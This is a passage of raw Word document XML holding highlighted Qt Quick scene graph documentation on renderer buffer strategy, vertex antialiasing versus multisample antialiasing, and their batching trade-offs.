      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDERER_BUFFER_STRATEGY</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[strategy]</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Valid values are</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Changing this value is mostly useful </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for platform vendors</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00BC420B" w:rsidRDefault="00815754" w:rsidP="00BC420B">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1720" w:name="antialiasing"/>
      <w:bookmarkStart w:id="1721" w:name="_Toc483000903"/>
      <w:bookmarkStart w:id="1722" w:name="_Toc483003894"/>
      <w:bookmarkStart w:id="1723" w:name="_Toc483604247"/>
      <w:bookmarkStart w:id="1724" w:name="_Toc483605467"/>
      <w:bookmarkEnd w:id="1720"/>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Antialiasing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1721"/>
      <w:bookmarkEnd w:id="1722"/>
      <w:bookmarkEnd w:id="1723"/>
      <w:bookmarkEnd w:id="1724"/>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The scene graph </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supports two types of antialiasing</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By default</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, primitives such as rectangles and images will be </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>antialiased by adding more vertices along the edge of the primitives so that the edges fade to transparent</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. We call this method</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vertex antialiasing</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the user requests a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multisampled OpenGL context</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, by setting a</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2076" w:history="1">
        <w:r w:rsidRPr="002C49E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSurfaceFormat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with samples </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>greater than</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6" w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2077" w:anchor="setFormat" w:history="1">
        <w:r w:rsidRPr="002C49E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::setFormat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(), the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">scene graph will prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multisample based antialiasing (MSAA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two techniques will affect how the rendering happens internally and have different limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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It is also </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible to override the antialiasing method</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by setting the environment variable</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_ANTIALIASING_METHOD</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to either</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vertex</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msaa</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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FE262C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vertex antialiasing can produce seams between edges of adjacent primitives, even when the two edges are mathmatically the same. Multisample antialiasing does not</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00BC420B">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1725" w:name="vertex-antialiasing"/>
      <w:bookmarkStart w:id="1726" w:name="_Toc483000904"/>
      <w:bookmarkStart w:id="1727" w:name="_Toc483003895"/>
      <w:bookmarkStart w:id="1728" w:name="_Toc483604248"/>
      <w:bookmarkStart w:id="1729" w:name="_Toc483605468"/>
      <w:bookmarkEnd w:id="1725"/>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vertex Antialiasing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1726"/>
      <w:bookmarkEnd w:id="1727"/>
      <w:bookmarkEnd w:id="1728"/>
      <w:bookmarkEnd w:id="1729"/>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Vertex antialiasing can be enabled and disabled on a per-item basis using the</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2078" w:anchor="antialiasing-prop" w:history="1">
        <w:r w:rsidRPr="00FE262C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::antialiasing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property. It will </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>work regardless of what the underlying hardware supports and produces higher quality antialiasing</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, both for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>normally rendered primitives</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and also for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE262C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>primitives captured into framebuffer objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, for instance using the</w:t>
      </w:r>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2079" w:history="1">
        <w:r w:rsidRPr="00BC420B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffectSource</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FE262C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>downside</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to using vertex antialiasing is that </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>each primitive with antialiasing enabled will have to be blended</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In terms of batching, this means that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renderer needs to do more work to figure out if the primitive can be batched or not and due to overlaps with other elements in the scene, it may also result in less batching, which could impact performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="008455FB" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
